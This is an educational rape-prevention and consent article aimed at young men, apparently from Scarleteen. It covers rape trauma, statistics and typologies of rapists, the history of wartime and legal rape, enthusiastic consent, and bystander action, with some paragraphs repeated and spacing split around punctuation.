During wanted sex with another person which is about the pleasure and personhood of everyone involved , we might feel excited , physically and emotionally high , close to that other person , awakened , taken care of , put in the best kind of spotlight , dizzy , heady or totally blissed - out .
We tend to have a silly grin on our faces afterwards that our friends often notice .
Even with sex that was n’t the best sex we ever had , when we have it with someone we like and care for , and when it ’s wanted , while we may be a little let down , we ’re not likely to feel traumatized or to be doing all we can to keep from crying or having a nervous breakdown .
What is in our heads the whole time we ’re having wanted sex is something like “ Yesyesyes -- moremoremore , ” not “ Nonono – stopstopstop . ”
It ’s “ I wish we could do this all day , ” not “ I wish he would just kill me and be done with it . ”
We should be present with our partner , glad they ’re there , not trying our best to block out what ’s going on and put our minds somewhere else in some effort to preserve our sanity and selfhood .
Most of us can agree that sex with another person which is wanted , and which absolutely was about us , not just the other person , will leave us feeling emotionally and physically uplifted or relaxed , not violated and injured .
After a rape , sexual abuse or attempted rape , a person who has been victimized often experiences what Ann Burgess and Lynda Holmstrom coined Rape Trauma Syndrome in 1974 .
Those three phases and their effects are as follows :
The Acute Phase :
This phase occurs immediately after the assault and usually lasts a few days to several weeks .
In this phase individuals can have many reactions but they typically fall into three categories of reactions :
Expressed -
This is when the survivor is openly emotional .
He or she may appear agitated or hysterical , he or she may suffer from crying spells or anxiety attacks .
- This is when the survivor is openly emotional .
He or she may appear agitated or hysterical , he or she may suffer from crying spells or anxiety attacks .
Controlled -
This is when the survivor appears to be without emotion and acts as if “ nothing happened ” and “ everything is fine . ”
This appearance of calm may be shock .
- This is when the survivor appears to be without emotion and acts as if “ nothing happened ” and “ everything is fine . ”
This appearance of calm may be shock .
Shocked Disbelief -
This is when the survivor reacts with a strong sense of disorientation .
He or she may have difficulty concentrating , making decisions , or doing everyday tasks .
He or she may also have poor recall of the assault .
The Outward Adjustment Phase : During this phase the individual resumes what appears to be his or her “ normal ” life but inside is suffering from considerable turmoil .
In this phase there are five primary coping techniques :
Minimization - Pretends that “ everything is fine ” or that “ it could have been worse . ”
- Pretends that “ everything is fine ” or that “ it could have been worse . ”
Dramatization - Cannot stop talking about the assault and it is what dominates their life and identity .
- Cannot stop talking about the assault and it is what dominates their life and identity .
Suppression - Refuses to discuss , acts as if it did not happen .
- Refuses to discuss , acts as if it did not happen .
Explanation - Analyzes what happened - what the individual did , what the rapist was thinking / feeling .
- Analyzes what happened - what the individual did , what the rapist was thinking / feeling .
Flight -
Tries to escape the pain ( moving , changing jobs , changing appearance , changing relationships , etc. ) .
There are many symptoms or behaviors that appear during this phase including : Continuing anxiety , severe mood swings , a sense of helplessness , persistent fears or phobias , depression , rage , difficulty sleeping ( nightmares , insomnia , etc ) , eating difficulties ( nausea , vomiting , compulsive eating , etc ) , denial , withdrawal from friends , family , activities , hypervigilance , reluctance to leave house and / or go places that remind the individual of the assault , sexual problems , difficulty concentrating and / or flashbacks .
The Resolution Phase : During this phase the assault is no longer the central focus of the individual ’s life .
While he or she may recognize that he or she will never forget the assault ; the pain and negative outcomes lessen over time .
Often the individual will begin to accept the rape as part of his or her life and chooses to move on .
Some rape victims do not get to that resolution phase , or take a long time to get to it , particularly those in communities or areas where they are blamed for their rapes or are without support and counseling resources .
Rape survivors also -- sometimes even years and years after their rapes -- often have to deal with difficult reactions to their rapes from their sexual or romantic partners .
Given how much cultural stock is still put in women 's sexual value -- and how often rape is seen as having " spoiled " a woman sexually -- and given the kinds of anger men have towards other men , but often misdirect at women , the person one would often look to for the most support can sometimes be just one more source of stress .
Too , since those who are raped do not tend to get a say in birth control or safer sex , many rape survivors also have to handle unwanted pregnancies and sexually transmitted infections in the midst of all the other trauma they ’re dealing with .
We can safely say that those after - effects are not what most people imagine they will feel after partnered sex , nor are they what most people experience after wanted , consensual partnered sex .
They are not things rapists tend to feel after they rape .
They are , however , what rape survivors feel and experience .
Who are rapists ?
The vast majority of rapists are and have always been male .
That does not mean that most men are rapists .
While many women will be raped , the majority will not be , and the majority of men are not rapists .
That also does not mean that ONLY men can rape , and that women cannot or do not ever rape .
Just because it is far more rare does not mean that women should not be doing everything in our power to be sure to obtain full consent from our sexual partners , and to only be having any kind of sex with partners who want to be having sex with us .
Now and then , we have had female users even at Scarleteen who presume that men or boys are always ready for sex , and do or should always say yes to sex , which is a dangerous and false presumption .
All this is n’t directed at you guys because it ’s all somehow okay if and when women rape or enable rape : it ’s not .
This article is directed at men both because rapists will nearly always be male , and because the help we need most right now with rape prevention is help from men .
A lot of people have inaccurate ideas of what rapists look like , act like or who they are , and think that there is just no way any of their friends , boyfriends or other men in their lives could rape .
Last year , on YouTube , a video surfaced -- distributed by the rapists -- of a group of boys who filmed , and later sold copies of that film , a gang rape .
As someone assaulted by a group of young men when I was young , it was incredibly painful and triggering for me to watch .
Seeing it caused me such upset , I had to just let myself be an emotional wreck for the rest of the day , and accept that I was going to feel delicate and on edge for the rest of the week .
When you survive a rape , it 's not something you want to think about or relive every day , and if you 've done some healing , you ( hopefully ) do n't usually have those images in your head every waking minute of your day .
Enough time has passed since that assault for me , and I 've done enough work in healing , that it 's rare enough for me to envision what I can recall from my assault .
But those images of a group of fresh - faced , smiling , laughing guys -- smiling and laughing while they knowingly tormented a developmentally disabled young woman -- brought it all back .
For some , what those young men looked like may have been a surprise , or it may have seemed an anomaly to see rapists that looked like any other bunch of guy friends having fun together .
( The eight teens were charged and pled guilty , but none served any jail time : instead six of them were only given counseling – a service not likely provided by the government for their victim – and community service work . )
But rapists usually look , act , smell , dress , talk and seem like anyone else .
While rapists are often acting out of a desire to punish , humiliate , dominate , overpower and / or control , and while the person they are raping is in turmoil in some way , they are generally still having a good time themselves , even when – and sometimes because -- they know the person they are raping is not .
While we know that for the person being raped rape is n't about sex , and while we know that for the rapist , it is n't only about sex , to at least some degree , a rapist is having sex on his part , and is expressing his sexuality in some way while raping .
Plenty of rapists also do not see themselves as rapists , even those who rape in such a way that is within a definition of rape which pretty much everyone can agree on and see clearly as rape .
Part of why it 's so difficult for anyone to protect themselves from rape is that we can rarely see a rapist coming with any sort of signs , and ca n’t tell who we should " expect " to be raped by .
Most rapists are liked by those they are n't raping , and who other men will vouch for .
Most people can't tell who a rapist is until they are being raped , and more often that not , that person is someone the victim would least expect to be attacked by .
Rapists are most often known to the people they rape .
Statistics from a wide variety of sources show that for the majority of rapes , most victims , be they male or female , know their rapists : they are friends , boyfriends , husbands , neighbors , teachers , even family .
One of the most quoted and credible studies on rape -- Tjaden and Thoennes , Extent , nature , and consequences of rape victimization : findings from the national violence against women survey .
Washington : National Institute of Justice ; 2006 -- showed that in 8 out of every 10 rape cases , the victim knows their rapist , and that it is far more common for women than for men to be raped by an intimate partner or date -- around 64 % of women are raped by a partner or date compared to around 16 % of male rape victims .
The 2005 National Crime Victimization Survey found that 73 % of rape victims knew their rapist .
Approximately 38 % of victims are raped by a friend or acquaintance ;
28 % of victims by an intimate partner ;
26 % of victims by a stranger ;
7 % of victims by another relative ;
and in 2 % of cases the relationship is unknown .
When it comes to rape , we – especially women -- can't always count on the people we trust not to rape , even people we 're told to trust most , which is obviously something awful to live with .
Someone who rapes may very well tell the person they rape that they love them , may have been their friend for years , may be someone who other male friends vouch for , and may even be related to the person they rape .
This is also another way that making rape all about danger from strangers not only does n’t help keep people from being victimized by rape , and keeps the more common forms of rape so invisible , but can do many people real harm .
Even though it may be a terrible truth to face , we ’re all safer being aware of it than we are trying to deny it .
What else do we know about rapists ?
According to the 1997 Sex Offenses and Offenders study , just more than half of rapists are white , and close to one - quarter of rapists are married .
Most rape their victims in the victims ’ own home , or in the home of a friend , neighbor or relative .
Only around one out of every ten rapes happens away from home and outside .
Only around 6 % of rapes involve the use of a weapon : most rapists rape via the physical force or their own bodies or by verbal and emotional force and / or coercion .
Around one out of every three rapists is intoxicated when he rapes .
Overall , rapists rape younger people more often than they do older people : in the United States alone , around 44 % of victims are under the age of 18 , 15 % are under the age of 12 and 80 % are under the age of 30 ( Bureau of Justice Statistics , U.S. Department of Justice , February 1997 ) .
Rapists are often classified into different profiles based on different models of classification , which you can read about here or here .
Rapists tend to believe that the people they are raping deserve to be raped , and most rapists are very opportunistic -- in other words , who they rape is n't usually about what someone is wearing , what someone says or where they are at : it is merely about them being available and it seeming to the rapist that he can succeed in raping that person and get away with it .
Rape also is n’t usually about a man strongly desiring sex and being unable to get it consensually .
In other words , a guy really wants to get laid , but ca n’t find a willing partner , and so he rapes : most experts on rape agree that rape of all types is primarily motivated by a desire for power and control , not just out of unmet sexual desire .
Mind , many men have been raised with ideas from other men that their part in sex is all about masculinity , domination and power - over , about subduing or a partner or making them surrender , which certainly does n’t help men to develop sexualities or sexual ethics which do n’t incorporate some of those qualities , and those kinds of attitudes certainly are part of rape .
Some couples do enjoy and want powerplay in their sex lives : having one partner be dominant and the other submissive .
But that does n't have to mean that someone gets assaulted or raped .
Rather , for those -- be that you or anyone else -- it means that powerplay in partnered sex takes place only when all parties informedly consent , when all also WANT or invites that sort of role play , and when it is clearly negotiated and acknowledged AS role play within limits , not some sort of essential given .
Communication when it comes to BDSM sex ( even if you ’re not calling it that ) , including firm agreement on what means stop , is as important as with any other kind of sex .
So if you and your partner are n’t ace communicators and not great with establishing and upholding boundaries , sex and / or sexual roleplay with domination and submission is n’t going to be safe for one or both of you .
The simplest typology is the Groth typology , which currently divides rapists into three primary types :
The anger rapist -- uses rape to degrade or humiliate women ; expresses much profanity ; attacks often prompted by some marital conflict , occupational or financial problem
The power rapist -- uses rape to express sexual conquest , establish masculine identity , and likely to kidnap victim for repeated assaults over an extended period of time
The sadistic rapist -- uses torture or bondage to experience sexual arousal over victim 's suffering ; frequently targets prostitutes , women who have had many sexual partners or who actively express their sexuality ( or are perceived as doing such , even if they really are n't ) , or those who symbolize something he wants to destroy or punish .
The first two types are most common , some rapists will bridge types , and all of these elements are often part of rape and the motivation to rape .
In plenty of ways , all of these are also parts of how people enable rape .
For instance , when we hear anyone -- be they a rapist or not -- express that a rape victim " deserved it , " for any reason , they 're reading from a rapist ’s script , because in most rapist ’s minds , all women or girls ( or men or boys , for those who rape those groups ) deserve it .
When we hear people express that male sexual dominance – be it over women and girls or over boys – is a given , or that rape and dismissing real consent is a “ boys will be boys ” activity , they ’re enabling the same sorts of ethos that those who rape usually share .
Men who trash - talk women as a group and who treat or think of women as sexual objects – or who mutely agree with other men who do , even if they disagree – are enabling behavior and ideas which make rape more prevalent .
We also know that less than 40 % of rapes are reported to the police , which is unsurprising given how much victim - blaming goes on in society , how poorly rape victims are often treated within the justice system , and how many messages raped people are sent that tell them their rapes are n’t really rape , and that it is n’t right for victims to speak up .
The rapists in those rapes , where a report was n't made , will not have to serve any time or suffer any sort of consequence for raping .
For only those rapes which are reported , only about 50 % result in arrests , only 80 % of those arrests result in conviction , and less than 17 % of reported rapists convicted of rape will ever even do time in prison .
When it comes to rape , the victims nearly always do far more “ time ” than the perpetrators .
Where did rape even come from ?
If you ’re wondering how rape all started and where it came from , the answer is that we ca n’t really pinpoint it to one area , or find that it started at a given time .
The few experts who have delved into and written about the history of rapists , do generally report that from what they know rape is n’t some sort of a universal given or something which we have sound reason to believe has been going on since the start of human life .
Professor Joanna Bourke , author of Rape : A History from 1860 to the Present , says that she ’s found no basis that there is anything “ natural ” or inevitable about male sexual violence , and that it tends to most often occur with men in specific settings or cultural power systems ; who feel required to enact rape as a kind of social performance , as proof of masculinity to their victims , other men or themselves .
In other words , when you hear someone express something like , “ Oh , that ’s just how men ARE , ” about rape and sexual violence , from what we know , they ’re wrong .
It ’s not how men are : it ’s how some men choose to be .
As an example of one of the most common settings for stranger rape that ’s about cultural power systems , we know that rape has been popularized and made more acceptable during wartimes among soldiers – groups of men both under ( in terms of their higher - ranked superiors ) and enacting ( in terms of the people in countries they were based in ) a system of power , violence and masculine hierarchy .
Nearly a hundred thousand women were raped during the Nanking Massacre .
Hundreds of thousands of women -- called , horribly , " comfort " women , since they were seen as responsible for providing " comfort " for soldiers -- were forced into prostitution during World War II , and millions of women were forcibly raped as that war ended .
During the Holocaust , while it ’s thought that rape occurred to Jewish women less often than it does to women during other wartimes , that was only because of racism :
Jews were seen as subhuman by Nazis and while rape was by no means considered a crime , racial mixing , or rassenschande , was .
Nonetheless , women were still frequently raped in the ghettos and camps , and in some concentration camps , brothels and “ escort services ” were set up for the soldiers which women were forced into , or bribed into with promises of food .
Some women in the camps were also “ experimented ” upon by Nazi doctors .
Dr. Hermann Stieve , as a particularly heinous example , would have guards rape the women , then brought to the gas chambers to be killed .
Their bodies would then be brought back for autopsies :
Stieve reported he wanted to see if their reproductive systems could handle stress ( rape being the stressor ) , and later published reports based on those studies without hesitation or apology .
During the Bosnian War , tens of thousands of women and girls were raped : during an organized Serbian program of cultural genocide , one goal was to make raped women pregnant , and to raise their children as Serbs .
A U.N. report estimated that during the relatively recent civil war in Rwanda , as many as 500,000 women and girls suffered brutal forms of sexual violence , including gang - rape and sexual mutilation , after which many of them were killed .
Gang rape is common during times of war , and in some cases , gang rapes during wartime have involved as many ( or more , for all we know ) as 80 men raping one single woman .
None of these scenarios are anomalies : rape as an agent of war or occupation has nearly always not only been prevalent , but a given .
Looking at rape during wartime , we can see very clear examples of what real male strength is and is not .
While those soldiers who have raped women during war were often told they were proving their masculinity , solidarity and strength , all they were doing was falling in line with some other man ’s orders to do someone else harm – and most often , they absolutely had a choice in that -- or with a system of masculinity that defined strength as dominance over women and obedience to other men .
It takes a lot more strength to challenge a status quo , or to refuse to follow the orders of some other man or system by refusing to rape or to enable rape than it does to rape , which is a show of profound weakness , not of being strong .
Too , for most of history -- and in plenty of places and people 's minds still -- rape was only or primarily considered a crime not against those BEING raped , but against those to whom a rape victim was considered to belong to .
In other words , rape was , and often still is , seen as a crime against property , women being that property .
In plenty of ancient societies , we know that bride capture was a standard practice : to obtain a wife , a man would kidnap her , rape her , and then marry her .
Not only was this practice socially acceptable , in plenty of cultures , it was viewed as an act of great heroism and machismo .
Bride capture made the woman her husband ’s property directly through rape .
Rape as a crime in areas where it was / is viewed as a crime against property was or is seen as victimizing that woman 's husband or father , the person who " owned " that woman , because the rapist would be taking something not that rightfully belonged to a woman or child , but as belonging to the person who owned them .
Appallingly , in some ancient laws , rapists were " punished " by being required to marry the woman they raped : what was supposed to punish them resulted in a woman being pawned off unto her rapist , giving him the legal right to rape her every day if he pleased , and that was considered okay so long as she was his property .
Rape law as we know it today , based on rape being a crime against the actual victim -- even though many of these laws are flawed -- did n't really exist until feminist movements took action and helped usher them into being or reform them in the late 1960 ’s , when women also started organizing rape crisis centers and domestic violence centers , as well as identifying things like rape trauma syndrome .
In the United States , the first law against marital rape – where a husband rapes his wife , which was not seen as a crime for so long because wives were considered their husband ’s property -- was n’t even imposed until 1976 .
How can men know if someone is giving consent or not ?
Sometimes , someone being raped will clearly say no and will NOT clearly say yes .
They might say no verbally , with words , they might say no by crying , they might say no by physically trying to push away the other person or get away from them .
They might try and change the subject from sex to something else , and some might try and make a deal with a rapist agreeing to a kind of sex they still do n't want , but feel might be less traumatic , in the hopes that if they provide that , they wo n't be forced to do other things they want to do even less , or are afraid of more .
They may also be saying no by nonparticipating in sex , by being passive or dissociating ( mentally going somewhere else in their heads so they do n’t have to be fully present during their rape ) .
In fact , when a person you or someone else is going to have sex with is physically unresponsive , not reacting to sex with some clear expression of enjoyment or is very nonverbal , the chance that pursuing sex with them is , instead , pursuing rape , are high .
There 's a weird idea that 's been out and about for hundreds and hundreds of years that it 's normal for a female partner to " just lay there , " -- and disturbingly , this has been a common complaint from heterosexual male partners about women -- or to be totally unengaged in sex .
The thing is , while that may be common , it 's anything but normal .
Someone who wants to be having sex with someone else -- who really wants to , which is the only time anyone should be having sex -- is n't just lying there , silent and prone .
They 're clearly engaged , and clearly and actively participating in the sex they ’re having .
Yes is yes .
No is not yes .
And neither is maybe .
When it comes to sex , " maybe " is n't yes .
At best , it ’s “ Not now , but perhaps another time ” -- and so in a scenario where the answer to “ Do you wanna ? ” is maybe , maybe is no .
Consent to sex is n’t an “ Ugh , okay , ” or an “ Ummm … I guess . ”
It ’s only an enthusiastic yes .
A lot of people have been ( and are still ) reared to think that sex with someone is something you " get , " and if someone will LET you get it – rather than really sharing it with you -- it 's all okay .
Those same folks have often also been reared with the idea that while no is no , maybe is yes ( and that even when someone says no , if they ’ll let you get away with ignoring their no , it ’s still okay to ignore their dissent ) .
We have a tragically long culture history of men being told then when women say " maybe " it ’s a cute way of saying yes , so it can be hard to recognize that under all the bizarre coyness usually affixed to that , being told a woman ’s maybe is yes is being told that sex is only about what men want , and that rape is okay , so long as you can get away with it or excuse rape in a way that the victim or others accept .
Let 's think about all that for a minute , and play nonconsent out in some other contexts .
• You 're making dinner for someone , your favorite spaghetti sauce , which you ’re intensely proud of .
But as it turns out , they are allergic to tomatoes .
You ask them if they ’re sure , and they assure you they are .
You suggest maybe it ’s different with your sauce somehow .
They say , again , that they ’re pretty sure they ’re still going to be allergic .
But you worked al day on the sauce , feel like they at least owe you one spoonful to see how great it is , so you ladle it unto their plate anyway , and in time , your nagging gets to tiresome that they go ahead and take a spoonful , even knowing they ’re likely to feel sick very shortly .
• Your friend 's Dad is huge with football : he ’s the football coach for the high school .
He will not leave his son alone about joining the team , and belittles him constantly for not having interest .
Your friend not only can't stand sports , but joining the football team would take away from the time he wants to put into the debate team to prepare for a career in law , where his heart is really at , and where his life goals lie .
As well , he knows that he 's going to have to put up with a lot of abuse from other fellows on the team because his dad is the coach , and because he ’s just not very athletic .
Your friend 's Dad is not leaving him alone about this , to the point that it 's clear his love is pretty conditional : if your friend gives up his own dreams and joins the team , his Dad is going to be a lot nicer to him .
Too , he 's just starting to feel really unloved because he 's not doing what his Dad wants him to do .
So , he joins the team , but only because he wants to escape his father ’s insults and pressure , and it costs him the pursuit of his own goals .
• Your best friend has been enjoying boxing a lot , so much that he 's started training to compete in pro fights .
Not only are you not excited about boxing , even watching is tough for you because you had a bad experience being beaten up when you were a kid .
But he wants you to try it with him – even though you know he ’s going to be rough with you and will probably hurt you : he ’s a lot bigger than you are , and you do n’t know how to box -- saying even when he gets hit , HE likes it , and he's also been saying some pretty crummy stuff to try and get you to do it , calling you a girl ( including to other people ) , saying you ’re a pussy , saying you are n’t really his friend if you do n’t support him by getting into the ring with him .
Wanting him to just stop verbally abusing you and maligning you to other people , you finally step in , only to get your nose broken , which he later will tell you and everyone else was your fault for not blocking your face from his punch .
• You and a friend are in an airplane , considering skydiving .
You only have some of the equipment you need , and might know some of how to do it , but you really are n't prepared or in a position to be safe , and just have n't made up your mind yet , and are only on the plane so you can get a better sense of what you want .
But he really wants you to do it , too , to give him the courage to do it .
You ’re explaining you ’re not sure at the same time he ’s just grabbing you with him as he jumps , pushing you out of the plane .
Do any of those scenarios seem like maybe is really yes , or that taking those actions after that maybe is anything but an abuse ?
Can you see how one party in those scenarios is coercing the other through verbal , emotional or physical force ?
The same goes with sex .
We can easily suss out that if your pal did n't even ASK you if you wanted to skydive , and just pushed you off a plane with no warning , that 'd be a clear assault and abuse .
If your friend had the conversation with you above , and still pushed you out of that plane – or even if he just got you to dive by nagging you -- would it be about him wanting to share something with you , and you with him , or would it be about bullying , about forcing you to do something for THEM , without respect for your wishes ?
In other words , it 's still an abuse ; it 's still an assault .
But what if my partner is quiet or shy ?
Establish a solid foundation for communicating together in a way in which they can comfortably communicate , even if it is n't always verbal , and take baby steps with until they can do that .
You might -- silly as it sounds , but sex is often silly -- devise hand signals , or think of some other creative , clear approach to communicate with .
You might also make a deal that you take turns initiating sex , so that one person is n't the only one in the driver 's seat .
Shy people often have a harder time when they feel put on the spot , so talking about and negotiating sex more outside of the bedroom , in advance , can be very helpful .
Establish a solid foundation for communicating together in a way in which they can comfortably communicate , even if it is n't always verbal , and take baby steps with until they can do that .
You might -- silly as it sounds , but sex is often silly -- devise hand signals , or think of some other creative , clear approach to communicate with .
You might also make a deal that you take turns initiating sex , so that one person is n't the only one in the driver 's seat .
Shy people often have a harder time when they feel put on the spot , so talking about and negotiating sex more outside of the bedroom , in advance , can be very helpful .
If they 're not yet able or ready to communicate about sex in any way , then tell them – kindly and with care , not as an ultimatum -- that you ’d prefer to wait for sex with them until they are more comfortable .
With shy people , they often just need more time to feel safe being open .
And with young women , given the world we live in and the way many are raised in terms of sex , it can take longer to get to a point where we do feel able to clearly communicate , to initiate sex , to voice our desires .
If you have a female partner who is n’t there yet , then wait until she is , or choose partners more on your same level .
But being prone , stiff or vacant during sex is n't usually about shy : it ’s usually about feeling very scared , not feeling at all ready , not knowing how to say no or about feeling like your no matters .
Someone saying nothing , or really just laying there ( and without some form of disability that limits their voice or mobility ) is n't usually being shy : they are , for whatever reason , finding it difficult or impossible to voice nonconsent .
When someone wants to , really wants to , have sex with us , we 'll know because that person will be taking a very active role , will be saying -- if not yelling ! --
" Yes ! " or " Please ! ” or " Do me NOW ! "
We may know because that person is the one initiating sex , at least as often as we are .
( If you ’re going to say that younger women just are n’t like that yet , know that is n’t always true .
Some are , but those who are n’t likely are n’t because things are either moving too fast , or they really just are n’t ready for or that interested in sex with you yet . )
We 'll know because it will feel like something we are absolutely doing together , that could n't happen if the other person was n't just as engaged as we are ( imagine trying to dance with someone else when they ’re just standing there or not really paying attention : same goes with sex ) .
We 'll know because our partners will absolutely not " just be lying there . "
We can easily be sure never to rape someone by making a choice to ONLY have sex with someone else when we are certain we have not only their full consent , but their full interest and attention , and they ours ; when they ’re clearly as enthusiastic about sex as we are , and we ’re just as excited about their enjoyment as we are our own .
If we 're having sex with a partner and they start to space or zone out , or stop participating physically or verbally , if we stop what we ’re doing and say , " Hey , you still into this ?
It 's okay if you 're not , we can do something else or just go snuggle , " and mean it – rather than saying it to imply they need to get into it , or else -- we can be sure not to rape .
If we are interested in sex with someone who seems they will allow us to have sex with them , but who is not taking equal part or deeply desiring and mutually initiating sex with us , we can and should step back and wait for them to take a lead .
Men can also pay attention to the factors which have been found to create a risk of them raping .
The Centers for Disease Control lists the following factors :
Individual Factors : Alcohol and drug use , coercive sexual fantasies , impulsive and antisocial tendencies , preference for impersonal sex , hostility towards women ( or , in male - male rape to other men or homophobia ) , hypermasculinity , childhood history of sexual and physical abuse , witnessed family violence as a child
Relationship Factors : Association with sexually aggressive and delinquent peers , family environment characterized by physical violence and few resources , strong patriarchal relationship or familial environment , emotionally unsupportive familial environment
Community Factors : Lack of employment opportunities , lack of institutional support from police and judicial system , general tolerance of sexual assault within the community , settings that support sexual violence , weak community sanctions against sexual violence perpetrators
Societal Factors : Poverty , societal norms that support sexual violence , societal norms that support male superiority and sexual entitlement , societal norms that maintain women 's inferiority and sexual submissiveness , weak laws and policies related to gender equity , high tolerance levels of crime and other forms of violence
Obviously , men can't control some of those factors .
But awareness of all of these factors , including the ones no one really can control , is helpful in and of itself .
Mitigating the factors -- for yourself , or helping male friends and family to mitigate them -- men CAN control , like how YOU think about and treat masculinity , how you view women , if you drink or drug it up excessively , and what kind of headspace you ’re in with sex , can make a very big difference .
Too , let 's not forget that even when it comes to society and culture , it 's made up of people , and every single one of us has the power to do things differently than the generations before us did .
When enough of us do them , we have the power to change culture so that we and our next generations do n't have the same negative influences .
We can all prevent rape by doing all we can to be sure that the interpersonal sexual dynamics we take part in never make our partners feel like they owe us sex out of obligation , or must have sex with us in order to keep us around , keep us treating them well , or keep us from becoming angry .
If our partner says no to something sexual we want , the only right response is “ Okay . ”
We can all prevent rape by remembering that when we want to engage in any kind of sex where we only really want to think of ourselves , that kind of sex should be masturbation , the kind where we are the only people involved and sex IS be completely about us and not about anyone else .
We can also easily prevent rape by truly being communicative during sex .
I know that lots of us have been raised to think -- and the media often supports that message -- that somehow , talking during sex is n't sexy , or that there should n't be any talking in sex .
However , those are very dangerous messages , and they 're messages that not only do a lot of people real harm , even for people in fully consenting sexual relationships , not talking about sex or during sex can really limit how good the sex both people are having even is , emotionally and physically .
Be clear in communicating with your partners about sex , and seek out clear communication from them : clear communication and responsiveness to that means that rape is unlikely and better sex is more likely : it ’s a win-win .
That does n’t mean you have to get verbal permission for every single second of every single sex act : just that you pay attention to your partner , check in with them now and then – especially with something new , or when they ’re a new partner – and be sure you ’re both talking and listening to each other about the sex you ’re having .
What more can we do to stop rape ?
There is a lot more all of us can do to help disengage our rape culture beyond not raping someone else .
Since again , most men or women wo n’t rape , these “ extras ” are the things most of us need to work on .
For instance , people will often report that they know or have known that someone else -- even people very close to them -- are or have been raping or abusing another and that they have never said anything , to that person or to anyone else .
Plenty of people have had an experience where they strongly suspected someone or known was raping someone else and they have still remained silent and passive .
Silence on anyone ’s part when it comes to rape never helps and always does harm .
It 's one thing when people avoid doing anything in those situations out of a real concern for their own personal safety , but in nearly any situation like this , there is always a way to help .
If you find yourself in this situation and are fearful for your own safety when it comes to saying or doing something , call the police anonymously , a hotline , or go get someone else to come help with you .
Some people feel like it ’s disloyal to report a friend , partner or family member who is raping or abusing , but your loyalty is never more important than someone else ’s life or keeping another person from incredible trauma .
Even if you ca n’t see it that way , at the very least recognize that rapists and abusers are troubled and often unlikely to stop , and far more unlikely if they are never held responsible .
Helping a friend stay disturbed and aiding them in doing harm through your inaction is n’t helping your friend .
We can also all get better at calling out acceptance or even applause for any kind of rape when we see it .
For instance , a friend joking about rape or sexual violence is n’t being funny : he ’s perpetuating rape culture .
If you laugh right along with him – rather than calling him out , or even just making a point of not laughing -- so are you .
If you trash - talk women , their bodies , or talk about sex as if it was n’t about two people ’s mutual benefit , make a promise to yourself to stop doing that right now .
Just like with racism , when anyone talks about hatred or disdain of any given group all the time , it tells other people around them that that hatred is acceptable .
That does n't mean you can't call out women when women do it , too : some women will joke about rape to other women through self - hatred , out of jealousy , the idea she 'll be safer if she does , or to try and be one of the guys , and it 's no more okay just because it 's coming out of a woman 's mouth .
Jackson Katz , author of The Macho Paradox : Why Some Men Hurt Women and How All Men Can Help , talks a lot about how hard it can be for men to learn to call one another out , and he 's right , it CAN be really tough ( you know that already ) .
It ’s often not easy for women , either : those of us who call men out often get harassed , name - called , slandered , and sometimes abused .
But again , if you want to earnestly be strong – not the fake kind of strong that ’s about harming other people and falling in line like a lemming – it ’s one great way to be so .
When a person ’s community and peers do n’t support rape and sexual or gender - based violence , it takes away the cheering section those kinds of people tend to rely on to support their hate , and can help prevent that person or others around them from raping or enabling rape .
Another thing you can do is to try not to take it too personally when women around you are fearful or wary of men – or speak critically about abusive men -- including you .
As a teen male or adult man , it ’s unlikely that you have to worry about being raped in your lifetime , especially by a man you know , because statistically , it ’s not likely you will be .
But with millions of women and girls raped every year , women and girls really do have good reason to worry about being assaulted by the men around them .
Women ca n’t help but worry about rape and sexual violence given how common it is , and because rape happens more often with men known to women , they also ca n’t help but be wary of even the men which they know and call friends or partners .
Getting angry at women for being worried about something so scary and so valid is neither fair nor helpful : it ’s better to simply listen , be trustworthy and patient , and ask what you can do to help them feel more safe .
One of the most important things you can do is not to deny rape happens , that it happens to many , many women , girls , boys and some men , and that it is overwhelmingly something young adult and adult men are largely responsible for singly and as a group .
You can be sure never to excuse rape or behavior that encourages or enables rape .
" Rape apologism " is a term used to describe those who excuse or deny rape , per rapes they engage in directly themselves , when it comes to rapes other people have done , or ideas about any kind of rape being okay or as a lesser violation than it is .
It 's about the ways that society dismisses and diminishes rape .
It 's about the ways that victims of rape are constantly accused of lying , or how they 're told that the crime is , in any way , their own fault .
If you can always come to the proverbial table with the unwavering conviction that rape happens and that it is never , ever okay , that alone , that ’s a powerful thing .
Here is a great roundup of what men can do to prevent rape , from Men Can Stop Rape :
Be aware of language .
Words are very powerful , especially when spoken by people with power over others .
We live in a society in which words are often used to put women down , where calling a girl or woman a " bitch , " " freak , " " whore , " " baby , " or " dog " is common .
Such language sends a message that females are less than fully human .
When we see women as inferior , it becomes easier to treat them with less respect , disregard their rights , and ignore their well - being .
Words are very powerful , especially when spoken by people with power over others .
We live in a society in which words are often used to put women down , where calling a girl or woman a " bitch , " " freak , " " whore , " " baby , " or " dog " is common .
Such language sends a message that females are less than fully human .
When we see women as inferior , it becomes easier to treat them with less respect , disregard their rights , and ignore their well - being .
Communicate .
Sexual violence often goes hand in hand with poor communication .
Our discomfort with talking honestly and openly about sex dramatically raises the risk of rape .
By learning effective sexual communication -- stating your desires clearly , listening to your partner , and asking when the situation is unclear -- men make sex safer for themselves and others .
Sexual violence often goes hand in hand with poor communication .
Our discomfort with talking honestly and openly about sex dramatically raises the risk of rape .
By learning effective sexual communication -- stating your desires clearly , listening to your partner , and asking when the situation is unclear -- men make sex safer for themselves and others .
Speak up .
You will probably never see a rape in progress , but you will see and hear attitudes and behaviors that degrade women and promote rape .
When your best friend tells a joke about rape , say you do n't find it funny .
When you read an article that blames a rape survivor for being assaulted , write a letter to the editor .
When laws are proposed that limit women 's rights , let politicians know that you wo n't support them .
Do anything but remain silent .
You will probably never see a rape in progress , but you will see and hear attitudes and behaviors that degrade women and promote rape .
When your best friend tells a joke about rape , say you do n't find it funny .
When you read an article that blames a rape survivor for being assaulted , write a letter to the editor .
When laws are proposed that limit women 's rights , let politicians know that you wo n't support them .
Do anything but remain silent .
Support survivors of rape .
Rape will not be taken seriously until everyone knows how common it is .
In the U.S. alone , more than one million women and girls are raped each year ( Rape in America , 1992 ) .
By learning to sensitively support survivors in their lives , men can help both women and other men feel safer to speak out about being raped and let the world know how serious a problem rape is .
Rape will not be taken seriously until everyone knows how common it is .
In the U.S. alone , more than one million women and girls are raped each year ( Rape in America , 1992 ) .
By learning to sensitively support survivors in their lives , men can help both women and other men feel safer to speak out about being raped and let the world know how serious a problem rape is .
Contribute your time and money .
Join or donate to an organization working to prevent violence against women .
Rape crisis centers , domestic violence agencies , and men's anti-rape groups count on donations for their survival and always need volunteers to share the workload .
Join or donate to an organization working to prevent violence against women .
Rape crisis centers , domestic violence agencies , and men's anti-rape groups count on donations for their survival and always need volunteers to share the workload .
